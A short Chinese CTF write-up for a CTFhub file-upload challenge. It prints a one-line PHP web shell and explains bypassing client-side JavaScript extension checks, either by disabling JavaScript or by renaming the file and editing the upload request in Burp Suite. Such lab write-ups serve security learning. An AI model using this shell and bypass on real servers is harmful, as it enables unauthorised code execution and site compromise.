CTFhub—文件上传(js前端验证)
一、一句话木马
文件名为hack.php
<?php @eval($_POST['123']); ?>
二、两种方法的思路
我们在上传文件时,我们客户端的javascript会对文件的类型进行一个校验,只允许 “.jpg” “.png” ".gif"的文件上传
方法1.我们可以关掉js前端验证,不让他验证,那么就可以直接上传一句话木马了。
方法2.将一句话木马的后缀改成验证允许的类型,在通过burpsuite抓包改包
三、方法一步骤
火狐浏览器—about:config (高级首选项) —关掉JavaScript
关掉 JavaScript 后,对文件的上传类型不限制,直接上传 hack.php
直接用蚁剑或者hackbar获得flag.
四、方法二步骤
将一句话木马 hack.php 改为 hack.jpg
浏览器设置代理 127.0.0.1:8080
burpsuite打开拦截请求
拦截到请求包,将 hack.jpg 后缀改回来 hack.php 然后转发(Forward)出去
上传成功。。。
得到flag…